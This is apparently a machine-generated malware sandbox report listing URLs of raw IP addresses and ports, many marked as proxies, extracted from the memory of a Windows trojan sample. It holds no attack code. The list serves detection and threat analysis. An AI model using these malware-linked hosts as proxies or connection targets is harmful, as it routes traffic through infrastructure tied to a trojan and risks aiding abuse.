                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.85.202:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.95.197:9992
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.1.95.197:9992://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.107.50.98:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.107.50.98:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.108.209.63:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.108.209.63:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C65FB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.125.51.54:27234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.184.224.91:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.184.224.91:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBBFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.189.48.255:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.189.48.255:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.27.86.36:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.27.86.36:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.15:8084
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.15:8084://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.8.16:8088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7618000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C762A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.96.178:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C761E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.96.178:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.98.46:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.43.98.46:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.162.133:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.49.162.133:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.57.172.172:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://179.57.172.172:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.133.16.21
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.133.16.21://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.133.16.21:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.134.236.231:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C78C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C823C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.133.116:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.135.211.182:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.141.177.23:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.142.81.218x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.144.77.146
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.144.77.146://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC019000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.144.77.146:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.185.169.15:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.185.169.15:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://18.195.164.53:7777://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.122.144.254:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.122.144.254:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.131.242.221:48678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.178.104.106:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.178.104.106:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.180.218.250:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.180.218.250:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.108.19:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.108.19:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.108.19:8080p
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.159.9:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C759F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.159.9:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.208.173:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.208.173:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.97.16:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C83D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.183.97.16:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.23.115:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.23.115:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.127:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.254.127:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.59.109:8082
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.191.59.109:8082://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.201:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.201:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.205:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.205:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.209:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.210.222.209:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.211.179.126:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.211.179.126:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8379000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.211.183.2:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.211.183.2:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.242.248.70:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.242.248.70:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.250.143.189:1111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.250.143.189:1111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.206.242:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.115.206.242:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.120.28.228:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.183.19:53281x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.243.35:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.243.35:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E10000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.43.3:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.129.43.3:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.106.162:52151
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.106.162:52151://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.158:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.11.158:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C768B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C903D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.143.125:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.143.125:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.69.227:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.143.69.227:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.15.154.154:52033
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.15.154.154:52033://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.176.221.151:9812
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.176.221.151:9812://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.188.206.62:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.188.206.62:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.191.94.126:8999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.191.94.126:8999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.196.254.201:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.196.254.201:999://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.198.32.212:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.198.32.212:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.123.70:52246
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.123.70:52246://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.27.74:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.204.27.74:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.190.52:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.190.52:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDC0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.230.58:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.230.58:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.205.41.210:7654://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://181.206.84.190:4153
